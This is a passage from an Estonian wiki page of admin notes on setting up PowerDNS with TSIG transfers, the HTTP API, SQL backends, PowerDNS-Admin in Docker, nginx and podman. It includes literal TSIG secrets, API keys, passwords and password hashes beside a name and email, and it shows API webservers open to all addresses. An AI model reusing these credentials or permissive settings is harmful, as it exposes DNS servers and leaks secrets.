ning seejärel võti ühe või enama tsooniedastusega seostada

# pdnsutil activate-tsig-key moraal.ee from_dns_to_itm master

Tulemus paistab nii

<pre>
# pdnsutil show-zone moraal.ee
Nov 26 14:09:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016112602 == 2016112602 (serial in the database)
Zone is not actively secured
Zone has following allowed TSIG key(s): from_dns_to_itm
Metadata items:
SOA-EDIT-API DEFAULT
TSIG-ALLOW-AXFR from_dns_to_itm
No keys for zone 'moraal.ee'.
</pre>

kontrolliks sobib kopeerida öeldes

$ dig @192.168.1.248 moraal.ee axfr -y "hmac-sha256:from_dns_to_itm:WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ=="

kusjuures vastuses on üks preudokirje lisaks

..
from_dns_to_itm. 0 ANY TSIG hmac-sha256. 1480164029 300 32 t96WhnpNiAiL5KHXa8UzNthM6/p3ciQptF3Br2ZfhFk= 3538 NOERROR 0
...

Väited

* Sama TSIG võtit saab kasutada mitme tsooni jaoks ja nii on mugavam nt NSD patternit kasutada
* tundub, et tsooni jaoks TSIG juurutamisega kaasneb, et tsooni kopeerimise ip piirang enam ei kehti (lubatud ip pealt pöördudes ei ole võtme esitamine vajalik)
* kui tsooni juures on tsig sisse lülitatud, siis see mõjub nii notify kui xfr jaoks
* TSIG pseudokirjete arv suureneb vastavalt tsooni mahu suurenemisele, https://tools.ietf.org/html/rfc2845 'The TSIG MUST be included on the first and last DNS envelopes. It can be optionally placed on any intermediary envelopes. It is expensive to include it on every envelopes, but it MUST be placed on at least every 100'th envelope.'

Alternatiiv on kasutada -y asemel -k suvandit ja argumendiks failinime, faili sisuga

<pre>
key "from_yks_to_teine" {
algorithm HMAC-SHA256;
secret "YY8xvlL6yGjrt1G4xlfLBaidQOFdvixHgRXN6tXUPMitEKZUs7kl7qixJ0nSN1bbDJQxaFGkoKkBamNS7EPXbw==";
};
</pre>

===API kasutamine===

Üle API muudatuse tegemiseks peab eelnevalt PowerDNS serveris lülitama API sisse ning sisemise webserver käivitama

# cat /etc/powerdns/pdns.conf
..
api=yes
api-key=apiparool
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24
...

ja kasutama nt sellist skripti (töökohaarvutis on seejuures abil kasutada nt jq utiliiti)

<pre>
# cat pdns-api.sh
curl -X PATCH --data \
'{"rrsets":
[{ "name": "www.moraal.ee.",
"records": [{ "content": "192.168.254.5", "disabled": false }],
"ttl": 86000,
"type": "A",
"changetype": "REPLACE"
}]
}' -H 'X-API-Key: midagisalajast123' http://192.168.1.248:8081/api/v1/servers/localhost/zones/moraal.ee. | jq .
</pre>

kus

* TODO

kas käivitamiseks öelda

$ sh pdns-api.sh

API'ga tutvumiseks võib olla hea mõte kuulata pealt mingi olemasoleva API-rakenduse ja serveri vahelist liiklust ja siis seda Wireshark abil uurida.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/httpapi/README/ - tundub, et süntaks pole seal kõigis näidetes päris korrektne

===PowerDNS kasutusstatistika===

PowerDNS sisaldab sisemist veebiserverit, mille käest saab küsida teenuse kasutusstatistikat, TODO.

===Logimine===

Tundub, et vaikimisi logitakse syslog'i.

===Varundamine ja taaste===

TODO

===Misc===

====Paigaldamine operatsioonisüsteemi paketihaldusest====

Paigaldamiseks sobib öelda, tuleb paigalda üldosa + mingi backend, nt BIND-ühilduvate tsoonifailide käsitlemise komponent (st failisüsteem)

# apt-get install pdns-server pdns-backend-bind

Tulemusena tekib failisüsteemi

* /etc/powerdns/pdns.conf - peamine seadistusfail

====MySQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====pdns-backend-mysql paigaldamine ja seadistamine====

Eeldusel, et MySQL baas juba töötab samas arvutis, sobib paigaldamiseks sobib öelda (seejuures kasutades db-config sistemat, mis paigaldamise käigus tekitab create database baasi, kasutaja, sätib privileegid jne)

# apt-get install pdns-backend-mysql
..
Determining localhost credentials from /etc/mysql/debian.cnf: succeeded.
dbconfig-common: writing config to /etc/dbconfig-common/pdns-backend-mysql.conf

Creating config file /etc/dbconfig-common/pdns-backend-mysql.conf with new version

Creating config file /etc/powerdns/pdns.d/pdns.local.gmysql.conf with new version
checking privileges on database pdns for pdns@localhost: user creation needed.
granting access to database pdns for pdns@localhost: success.
verifying access for pdns@localhost: success.
creating database pdns: success.
verifying database pdns exists: success.
populating database via sql... done.
dbconfig-common: flushing administrative password
Processing triggers for libc-bin (2.24-3) ...
Processing triggers for pdns-server (4.0.1-5) ...

Tulemusena

* tekitatakse MySQL kasutaja pdns
* tekitatakse MySQL create database pdns

====BIND backend kasutamine====

Tundub, et otsekoheselt failisüsteemis tsoonifaili redigeerimise teel on mõeldav töötada ainult BIND-formaadis backendiga. Muudega tuleks kasutada pdnsutil utiliiti või API liidest. Tsoonide nimekiri kirjeldatakse failis

# cat /etc/powerdns/named.conf
# Debian default: supermaster created zones are written here:
include "/var/lib/powerdns/supermaster.conf";
# Example for a manually configured slave zone:
#
zone "example.net" {
file "/var/lib/powerdns/zones.slave.d/example.net.zone";
type master;
masters { 192.0.2.53; };
};

Tsoon kirjeldatakse failis

# cat /var/lib/powerdns/zones.slave.d/example.net.zone
$TTL 180
@ IN SOA ns1.example.net. hostmaster.example.net. (
2014080705 ; Serial Number (date YYYYMMDD++)
86400 ; Refresh (24 hours)
1800 ; Retry (1/2 hour)
3600000 ; Expire (42 days)
21600) ; Minimum (6 hours)
IN NS ns1.example.net.
IN NS ns2.example.net.

@ IN A 192.168.0.15
IN MX 10 mail.example.net.
www IN A 192.168.0.15
mail IN A 192.168.0.2
ns1 IN A 10.1.1.171
ns2 IN A 10.1.1.172
imre IN A 10.1.1.173

Muudatuse kehtestamiseks

# pdns_control bind-reload-now example.net
example.net: parsed into memory at 2016-10-26 20:43:14 +0300

====PostgreSQL backend kasutamine====

Teoreetliselt võib sodida tsooni sisu muutmiseks üldotstarbelise sql editoriga (nt PgAdmin) ka otse baasis, aga praktilisem on kasutada ehk pdnsutil või api't kasutava tarkvara abil, nt nsedit veebiliides.

====BIND backend kasutamine====

pdns-backend-bind seadistatakse failist

# egrep -v "^$|^#" /etc/powerdns/pdns.d/bind.conf
launch+=bind
bind-config=/etc/powerdns/named.conf
bind-supermaster-config=/var/lib/powerdns/supermaster.conf
bind-supermaster-destdir=/var/lib/powerdns/zones.slave.d

kus

* /etc/powerdns/named.conf - tsoonide nimekiri
* /var/lib/powerdns/supermaster.conf - lihtsal juhul tühi
* /var/lib/powerdns/zones.slave.d - BIND formaadis tsoonifailide kataloog

Tsoonide haldamisega tegeleb edasi allpool olev punkt.

====Poweradmin====

Märkus: tõenäoliselt ei ole Poweradmin tarvkara kasutamine hea mõte kuna rakendus sodib otse PowerDNS andmebaasis ja 2016 aasta sügisel on hakanud tekkima paremaid alternatiive, nt nsedit.

Poweradmin kasutamiseks peab PowerDNS kasutama SQL andmebaasi ja Poweradmin peab töötama vastu sama andmebaasi. Tundub, et Poweradmin töötab paremini MySQL + PHP5 keskkonnas. Kui Poweradmin PHP rakendus töötab teises arvutis kui MySQL baas, sobib baasis öelda

mysql> grant all privileges on pdns.* to 'pdns'@'%' identified by 'dbconfig sisestatud parool';
mysql> grant all privileges on pdns.* to 'pdns'@'localhost' identified by 'dbconfig sisestatud parool';
mysql> flush privileges;

# pdns_control retrieve moraal.ee
Added retrieval request for 'moraal.ee.' from master 192.168.1.247

Kasulikud lisamaterjalid

* https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-powerdns-with-a-mariadb-backend-on-ubuntu-14-04

====Tsooni andmestikust otsing====

* Kõigi forward tsoonide sisust ip aadressi kasutamise leidmine

# for i in `pdns_control list-zones | grep -v All | grep -v in-addr`; do pdnsutil list-zone $i 2>&1 ; done | grep 10.20.123.154
ftp.moraal.ee 300 IN A 10.20.123.154

===2024 aasta kevade tähelepanekud===

Eesmärk

* ühe operatsioonisüteemi peal kompaktselt lahenduse pidamine - Debian v. 12
* dns server - PowerDNS
* webgui haldusliides - PowerDNS-Admin (PDA)
* dnssec võimekus
* docker abil kasutatakse konteinerit (PDA)
* andmeid hoitakse PostgreSQL andmebaasis

====Tööpõhimõte====

Väited

* dnssec kasutab algoritmi nr 13
* NSEC3 kasutab '1 0 0 -' seadistust
* sekundaarsete nimeserveritega suhtlemine toimub catalog-zones abil
* kasutatakse KSK/ZSK ja CSK lähenemist võtmete pidamisel

Protseduuride võimekus

* NSEC, NSEC3 ja NSEC3 param väärtuste muutmine
* võtme vahetus
* krüptimise algoritmi vahetus

====Platvormi ettevalmistamine====

Platvorm koosneb

* Debian v. 12 operatsioonisüsteem
* Docker Community Edition
* PostgreSQL v. 12
* NginX

PostgreSQL

<pre>
root@pdns:/tmp# apt-get install postgresql-common
root@pdns:/tmp# mkdir /etc/postgresql-common/createcluster.d
root@pdns:/tmp# echo "initdb_options = '--data-checksums'" > /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# echo "create_main_cluster = false" >> /etc/postgresql-common/createcluster.d/moraal.conf
root@pdns:/tmp# apt-get install postgresql-16
root@pdns:/tmp# pg_createcluster --locale en_US.UTF-8 16 pgcluster_pdns_prod

postgres=# \x
Expanded display is on.
postgres=# \l postgres
List of databases
-[ RECORD 1 ]-----+------------
Name | postgres
Owner | postgres
Encoding | UTF8
Locale Provider | libc
Collate | en_US.UTF-8
Ctype | en_US.UTF-8
ICU Locale |
ICU Rules |
Access privileges |
</pre>

PowerDNS kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pdns login;
sql> \password pdns
sql> create database db_pdns owner = pdns;
</pre>

PowerDNS-Admin kasutaja ja create database baasi tekitamiseks sobib öelda

<pre>
# su - postgres
$ psql
sql> create role pda login;
sql> \password pda
sql> create database db_pda owner = pda;
</pre>

====PowerDNS paigaldamine====

PowerDNS ise ja tema tööks otseselt vajalikud komponendid (nt PostgreSQL andmebaas) töötavad nö tavalisel viisil operatsioonisüsteemi protsesside-teenustena st mitte-konteineritena.

<pre>
# apt-get install pdns-server pdns-backend-pgsql pdns-tools
</pre>

Tulemusena käivitatakse pdns server ja tema bind backend.

TODO

PostgreSQL backend kasutamine

<pre>
# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql
Password for user pdns:
CREATE TABLE
CREATE INDEX
CREATE INDEX
CREATE TABLE
CREATE INDEX
...
</pre>

Baasi ligipääs jms kirjeldatakse failis, https://doc.powerdns.com/authoritative/backends/generic-postgresql.html#

<pre>
root@pdns:~# egrep -v "^#|^$" /etc/powerdns/pdns.d/gpgsql.conf
launch+=gpgsql
gpgsql-dbname=db_pdns
gpgsql-dnssec=yes
gpgsql-host=127.0.0.1
gpgsql-password=parool
gpgsql-port=5432
gpgsql-user=pdns
</pre>

bind eemaldamiseks sobib kustutada fail

# rm /etc/powerdns/pdns.d/bind.conf

Tulemusena töötab pdns server, gpgsql backendiga

<pre>
2024-06-16T16:44:00.877817+03:00 pdns systemd[1]: Starting pdns.service - PowerDNS Authoritative Server...
2024-06-16T16:44:00.906026+03:00 pdns pdns_server[3916]: Loading '/usr/lib/x86_64-linux-gnu/pdns/libgpgsqlbackend.so'
2024-06-16T16:44:00.906356+03:00 pdns pdns_server[3916]: This is a standalone pdns
2024-06-16T16:44:00.906408+03:00 pdns pdns_server[3916]: Listening on controlsocket in '/run/pdns/pdns.controlsocket'
2024-06-16T16:44:00.906668+03:00 pdns pdns_server[3916]: UDP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906684+03:00 pdns pdns_server[3916]: UDP server bound to [::]:53
2024-06-16T16:44:00.906735+03:00 pdns pdns_server[3916]: TCP server bound to 0.0.0.0:53
2024-06-16T16:44:00.906750+03:00 pdns pdns_server[3916]: TCP server bound to [::]:53
2024-06-16T16:44:00.906866+03:00 pdns pdns_server[3916]: PowerDNS Authoritative Server 4.9.1 (C) PowerDNS.COM BV
2024-06-16T16:44:00.906881+03:00 pdns pdns_server[3916]: Using 64-bits mode. Built using gcc 12.2.0 on May 28 2024 07:46:05 by root@localhost.
2024-06-16T16:44:00.906891+03:00 pdns pdns_server[3916]: PowerDNS comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it according to the terms of the GPL version 2.
2024-06-16T16:44:00.915255+03:00 pdns pdns_server[3916]: Polled security status of version 4.9.1 at startup, no known issues reported: OK
2024-06-16T16:44:00.926644+03:00 pdns pdns_server[3916]: Creating backend connection for TCP
2024-06-16T16:44:00.935773+03:00 pdns pdns_server[3916]: About to create 3 backend threads for UDP
2024-06-16T16:44:00.935850+03:00 pdns systemd[1]: Started pdns.service - PowerDNS Authoritative Server.
2024-06-16T16:44:01.086206+03:00 pdns pdns_server[3916]: Done launching threads, ready to distribute questions
</pre>

ühtegi tsooni ei ole kirjeldatud

<pre>
root@pdns:/tmp# pdnsutil list-all-zones
root@pdns:/tmp#
</pre>

====PowerDNS seadistamine====

Seadistamisel tegeldakse

* api sisselülitamine (PDA jaoks)
* SOA kirje vaikeväärtused
* DNSSEC vaike krüpto

====PowerDNS-Admin paigaldamine - PDA - docker====

PowerDNS-Admin tarvkara töötab docker konteinerina, aga kasutab host arvutist postgresql andmebaasi. Platvorm ettevalmistamine punktis on vajalik kasutaja ja create database tekitatud. PDA kasutamine eeldab, et PDNS juures on sisse lülitatud api liides (vaikimisi http liiklus üle port 8081).

Docker compose fail

<pre>
root@pdns:~# cat docker-compose-pda.yml
services:
svc_pda:
image: powerdnsadmin/pda-legacy:v0.4.2

container_name: cn_pda
restart: always
logging:
driver: json-file
options:
max-size: 50m
ports:
- "9191:80"
environment:
- SECRET_KEY='saladus'
- SQLALCHEMY_DATABASE_URI=postgresql://pda:pdaparool@192.168.10.53/pda
- GUNICORN_TIMEOUT=60
- GUNICORN_WORKERS=2
- GUNICORN_LOGLEVEL=DEBUG
- OFFLINE_MODE=False
- CSRF_COOKIE_SECURE=False

networks:
- nw_pda

networks:
nw_pda:
name: nw_pda
driver: bridge
</pre>

Käivitamiseks

# docker compose -f docker-compose-pda.yml up -d

Tulemusena on aadressil http://192.168.10.53:9191/ PDA webgui sisselogimise ekraan. Pressida Create Account ja esimesena tekitatud kasutaja on admin privileegidega.

TODO

====PowerDNS-Admin paigaldamine - NginX operatsioonisüsteem====

NginX https:// frontend kasutamiseks sobib kasutada sellist seadistust

<pre>
root@pdns:/etc/nginx/sites-enabled# cat /etc/nginx/sites-enabled/pdns
server {
listen 80;
server_name pdns.moraal.ee;
root /var/www/html;

if ($request_uri !~ /.well-known) {
return 301 https://pdns.moraal.ee/;
}
}

server {
listen 443 ssl http2;
server_name pdns.moraal.ee;
ssl_certificate /etc/ssl/localcerts/pdns.moraal.ee.pem;
ssl_certificate_key /etc/ssl/localcerts/pdns.moraal.ee.key;
ssl_session_timeout 1d;
ssl_session_cache shared:MozSSL:10m;
ssl_session_tickets off;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_prefer_server_ciphers off;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-CHACHA20-POLY1305;

client_max_body_size 25m;

ssl_stapling off;
add_header Strict-Transport-Security "max-age=63072000" always;

access_log /var/log/nginx/access-pdns.moraal.ee-443.log;
root /var/www/html;

location / {
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header X-Forwarded-Proto https;
proxy_pass http://192.168.10.53:9191;
}
}
</pre>

====PowerDNS-Admin paigaldamine - NginX docker====

<pre>
# cat /srv/pdns/volume/nginx/etc/nginx/nginx.conf
# nginx.conf

user nginx;
worker_processes auto;
error_log /dev/stderr;
pid /var/run/nginx.pid;

events {
worker_connections 1024;
}

http {
include mime.types;
default_type application/octet-stream;

log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /dev/stdout main;

sendfile on;
keepalive_timeout 65;

# Redirect HTTP to HTTPS
server {
listen 80;
server_name _;
return 301 https://$host$request_uri;
}

# HTTPS Configuration
server {
listen 443 ssl;
server_name _;
http2 on;
ssl_protocols TLSv1.3;
ssl_prefer_server_ciphers on;

ssl_certificate /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.crt;
ssl_certificate_key /etc/ssl/localcerts/ns-pdns-01.auul.pri.ee.key;

# Recommended security settings
ssl_session_cache shared:SSL:10m;
ssl_session_timeout 10m;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305;

# Logging
access_log /dev/stdout;
error_log /dev/stdout;

# Reverse proxy to the destination
location / {
proxy_pass http://svc_pdns:8081;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
}
</pre>

====Misc====

Tulemusena saab pda webgui poole pöörduda aadressiga https://pdns.moraal.ee/.

PDA kasutaja parooli muutmine postgresql baasis, nb rakendus kasutab tabeli nimena 'user', see on postgresql nö built-in objekt ja name clash ületamiseks tuleb pöörduda rakendusega seotud ressursi poole "user" abil, eriti koos skeemi prefiksiga

<pre>
# su - postgres
$ psql db_pda
pda=# select * from public."user";
-[ RECORD 1 ]------------------------------------------------------------
id | 1
username | admin
password | $2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FF
firstname | Imre
lastname | Oolberg
email | imre.oolberg@auul.pri.ee
otp_secret |
role_id | 1
confirmed | f
..

db_pda=# update public."user" set password='$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC' where username='admin';
UPDATE 1
</pre>

kusjuures password väärtus tekitatakse nt

<pre>
$ htpasswd -bnBC 15 "" pdaparool | tr -d ':\n'
$2y$15$NgdA4JSsKb1RyaiWBdKjcODfgxkwmhMB.95sa07PX/d9a9QxZ/4FC
</pre>

Kasutaja lisamine

<pre>
db_pda=# insert into "user" (username, password, firstname, lastname, email, role_id, confirmed) values ('admin', '$2b$12$4M9qXQaWn95GTregvSO2v.I/1QQT0/Ayqt3jZsMp06FIa5dMme6Gu', 'Administrator', 'Administrator', 'priit@moraal.ee', 1, 'f');
</pre>

pdns api kontakti lisamine

<pre>
db_pda=# insert into setting (name, value) values ('pdns_api_url', 'http://192.168.10.80:8081');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_api_key', 'apiparool');
INSERT 0 1
db_pda=# insert into setting (name, value) values ('pdns_version', '4.9.11');
INSERT 0 1
db_pda=# select * from setting;
id | name | value
----+--------------+------------------------
7 | pdns_api_url | http://192.168.10.80:8081
8 | pdns_api_key | apiparool
9 | pdns_version | 4.9.11
(3 rows)
</pre>

====PDA kasutamise privileegid====

Väited

* Account - grupi taoline moodustis, praktiliselt võiks vastata domeeni omanik asutusele
* User - kasutaja taoline moodustis, vastab inimesele kes süsteemi kasutab
* User ja Account vaheliste seoste abil saab anda hulgale kasutajatele õiguse tegeleda hulga domeenidega

<pre>
root@rv-xxx-01:/opt/pda/dc# docker exec -ti e8 sh
/app $ ps aux
PID USER TIME COMMAND
1 pda 0:00 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
7 pda 0:02 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG
8 pda 0:01 {gunicorn} /usr/bin/python3 /usr/bin/gunicorn powerdnsadmin:create_app() -t 60 --workers 2 --bind 0.0.0.0:80 --log-level DEBUG

[2025-10-31 13:06:25,927] [record.py:61] ERROR - Cannot fetch zone's record data from remote powerdns api. DETAIL: HTTPSConnectionPool(host='rvxxx-01.test.moraal.ee', port=443): Max retries exceeded with url: /api/v1/servers/localhost/zones/imretest-03.ee (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self-signed certificate in certificate chain (_ssl.c:1007)')))

volumes:
# - /opt/pda/volume/pda/etc/ssl/certs/ca-certificates.crt:/usr/lib/python3.10/site-packages/certifi/cacert.pem
</pre>

====PDA API liidese kasutamine====

Tsooni tekitamine

<pre>
$ curl -s -L -H 'Content-Type: application/json' -H 'Authorization: Basic xxx' -X POST https://pda.moraal.ee/api/v1/pdnsadmin/zones \
--data '{"name": "zone-moraal-imre-test-01.ee.", "kind": "MASTER", "nameservers": ["ans1.moraal.ee.", "ans2.moraal.ee."]}' | jq .
{
"account": "",
"api_rectify": false,
"catalog": "",
"dnssec": false,
"edited_serial": 2026010802,
"id": "zone-moraal-imre-test-01.ee.",
"kind": "Master",
"last_check": 0,
"master_tsig_key_ids": [],
"masters": [],
"name": "zone-moraal-imre-test-01.ee.",
"notified_serial": 0,
"nsec3narrow": false,
"nsec3param": "",
"rrsets": [
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee. hostmaster.moraal.ee. 2026010801 86400 7200 2419200 10800",
"disabled": false
}
],
"ttl": 3600,
"type": "SOA"
},
{
"comments": [],
"name": "zone-moraal-imre-test-01.ee.",
"records": [
{
"content": "ans1.moraal.ee.",
"disabled": false
},
{
"content": "ans2.moraal.ee.",
"disabled": false
}
],
"ttl": 3600,
"type": "NS"
}
],
"serial": 2026010801,
"slave_tsig_key_ids": [],
"soa_edit": "",
"soa_edit_api": "DEFAULT",
"url": "/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee."
}
</pre>

Kui pole ligipääsu saab sellise vastuse

<pre>
% curl -s -L -H 'Content-Type: application/json' -H 'X-API-KEY: xxx' -X GET "https://pda.moraal.ee/api/v1/servers/localhost/zones/zone-moraal-imre-test-01.ee" | jq .
{
"msg": "Zone access not allowed"
}
</pre>

===pdns docker lahendus===

<pre>
# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.1,192.168.10.0/24
allow-notify-from=
allow-unsigned-notify=yes
also-notify=
api=yes
api-key=saladus
default-api-rectify=yes
default-ksk-algorithm=ecdsa256
default-soa-content=ans1.auu.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600
disable-syslog=no
forward-notify=
include-dir=/etc/powerdns/pdns.d
launch=
local-address=172.30.0.15, 10.30.0.15
local-port=53
log-dns-details=yes
log-dns-queries=yes
log-timestamp=yes
loglevel=4
only-notify=
primary=yes
secondary=yes
webserver=yes
webserver-address=10.30.0.15
webserver-allow-from=0.0.0.0/0
webserver-loglevel=detailed
webserver-password=saladus
webserver-port=8081
</pre>

===pdns podman lahendus===

PDNS Quadlet Service kirjeldus

<pre>
kasutaja@ns-pdns-01:~$ cat .config/containers/systemd/pdns-01.container
[Unit]
Description=My PDNS Quadlet Service
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/powerdns/pdns-auth-49:latest
PublishPort=1053:8053/tcp
PublishPort=1053:8053/udp
ContainerName=pdns-01
Volume=%h/volume/pdns/etc/powerdns/pdns.conf:/etc/powerdns/pdns.conf:ro
Environment=PDNS_local_port=8053

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

ning pdns.conf seadistusfail

<pre>
# cat /opt/pdns/volume/pdns/etc/powerdns/pdns.conf
local-address=0.0.0.0
launch=
# include-dir=/etc/powerdns/pdns.d
api=yes
api-key=parool
webserver=yes
webserver-address=0.0.0.0
webserver-allow-from=0.0.0.0/0

#master=yes

primary=yes
secondary=yes
allow-axfr-ips= 100.20.21.0/24,127.0.0.1/32,172.17.0.0/16
also-notify=192.168.1.150
only-notify=
forward-notify=
default-soa-content=ans1.auul.pri.ee hostmaster.auul.pri.ee 0 86400 7200 2419200 10800
default-soa-edit=INCEPTION-INCREMENT
default-soa-edit-signed=INCEPTION-INCREMENT
default-ttl=3600

default-ksk-algorithm=ecdsa256
default-api-rectify=yes
# default-nsec3-param=1 0 0 -

launch+=gpgsql
gpgsql-dnssec=yes
gpgsql-extra-connection-parameters=password=parool dbname=db_pdns port=5432 user=pdns host=192.168.1.147
</pre>

===Tsooni migreerimine pädeva pdns peale===

Väited

* SOA-EDIT -

====Protseduur====

TODO

====Käsundamine====

Eksport

<pre>
# pdnsutil show-zone moraal.ee
# pdnsutil export-zone-key moraal.ee 17 > moraal.ee.ksk
# pdnsutil list-zone moraal.ee > moraal.ee.zone
</pre>

Import

<pre>
# pdnsutil load-zone moraal.ee.zone
# pdnsutil set-kind moraal.ee master
# pdnsutil set-meta moraal.ee SOA-EDIT-API DEFAULT
# pdnsutil set-meta moraal.ee SOA-EDIT INCEPTION-INCREMENT
# pdnsutil import-zone-key moraal.ee moraal.ee.ksk ksk
# pdnsutil set-nsec3 moraal.ee '1 0 0 -'
# pdnsutil rectify-zone moraal.ee
# pdnsutil show-zone moraal.ee
</pre>

====Käsundamine - 2nd abil====

Tekitatakse migreeritava tsooni sekundaar

<pre>
# pdnsutil create-secondary-zone moraal.ee 192.168.1.148
</pre>

===Kasulikud lisamaterjalid===

* https://www.powerdns.com/
* http://www.poweradmin.org/
* https://github.com/PowerDNS/pdns/wiki/WebFrontends
* http://jpmens.net/2010/10/29/alternative-dns-servers-the-book-as-pdf/
* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/
* https://www.cloudflare.com/dns/dnssec/how-dnssec-works/

PowerDNS Authoritative Server nimeserveri kasutamine

2026-06-17T10:58:26Z

Imre: /* Tsooni migreerimine pädeva pdns peale */

===Sissejuhatus===

PowerDNS https://www.powerdns.com/ on üks populaarsetest vaba tarkvaralistest nn alternatiivsetest DNS serveritest, kuigi 'alternatiivse' kohta väidetavalt teda kasutatakse väga massiliselt DNSSEC jaoks. PowerDNS tarkvara võimaldab pidada täielist DNS infrastruktuuri, sh slave ja master pädevate nimeserverite erinevad konfiguratsioonid. PowerDNS tarkvara komplekti kuuluvad

* PowerDNS Authoritative Server - pädev nimeserver
* PowerDNS Recursor - rekursiivne nimeserver
* dnsdist - koormusjaotur

PowerDNS Authoritative Server tarkvaral on sellised tunnused

* võimalus kasutada andmete salvestamiseks erinevaid nn backend'isid (nn plain text, sql andmebaas, ldap kataloog jne)
* väga mugavalt korraldada DNSSEC tsooni pidamist
* DNSSEC puhul on PowerDNS tarkvarale iseloomulik, et kõik DNSSEC moodustatakse käigult, st midagi ei ole salvestatud (well, midagi puhverdatakse, aga rrsig moodi kirjeid jms ei hoita nö tsoonifaili kujul)
* tsoonide käsitlemine (tekitamine, sisu muutmine, eemaldamine) on võimalik üle nn API
* eksisteerivad mitmesugused veebipõhised tsoonide haldusliidesed (otse baasi ja üle API)
* ebamugav on kontrollida, kust tsooni kopeeritakse, kuhu notify saadetakse ja kust lubatakse tsooni kopeerida

Haldusliidesed jagunevad kaheks

* kirjutavad otse samasse sql baasi, mida kasutab PowerDNS ja tegelikult töötavadki ainult SQL backendide puhul - nt Poweradmin, http://www.poweradmin.org/
* suhtlevad PowerDNS'iga üle API, töötavad kõigi backendide puhul - nt nsedit, https://github.com/tuxis-ie/nsedit

Järgnevas tekstis öeldakse lühiduse mõttes PowerDNS ja mõeldakse PowerDNS Authoritative Server ehk pädevat komponenti.

===Tööpõhimõte===

PowerDNS tarkvara saab kasutada erinevates konfiguratsioonides

* nö suure pildi mõttes, nt PowerDNS on varjatud master ja avalikus võrgus teenindavad NSD nimeserverid (alternatiiv oleks pidada PowerDNS nimeserverit otse avalikus võrgus)
* PowerDNS enda komponentidest on välja valitud mingi komplekt, nt baas osa ja PostgreSQL backend (alternatiiv oleks BIND formaadis tekstifailid failisüsteemis)
* tsooniandmete haldamiseks kasutatakse käsurea utiliiti pdnsutil ja nsedit php rakendust

Käesolevas tekstis keskendutakse just mainitud konfiguratsioonile. Kui PowerDNS kasutab SQL backendi, siis avaliku pädeva DNS teenuse pakkumise juures tekitab see vähemalt esmapilgul kahtlusi. Võib olla on hea mõte tekitada varjatud masteriga lahendus

ans1 (NSD) ans2 (NSD)
_____ _____
| | | |
| | | |
|_____| port 8952 |_____| port 8952
| |
| |
----|---------------------|----------------------|----
|
__|__
| | nimetaja (PowerDNS)
| |
|_____|

kus

* ans1, ans2 - avalikud pädevad nimeserverid, tehniliselt slave'id
* nimetaja - varjatud pädev nimeserver, tehniliselt master
* üle port 8952 saab nsd protsessi eemalt juhtida (alternatiiv on juhtida nö tavalisel viisil, lokaalselt)

Käesolevas tekstis pööratakse NSD tarkvara kasutamisele tähelepanu minimaalselt. NSD tekst asub aadressil [[:Pädeva nimeserveri NSD v. 4 kasutamine operatsioonisüsteemiga Debian]].

===Tarkvara paigaldamine ja seadistamine===

Tarkvara paigaldamiseks on üldiselt kaks võimalust

* operatsioonisüsteemi paketihaldus
* PowerDNS repositoorium - https://repo.powerdns.com/

PowerDNS tarkvara on jaotatud komponentideks

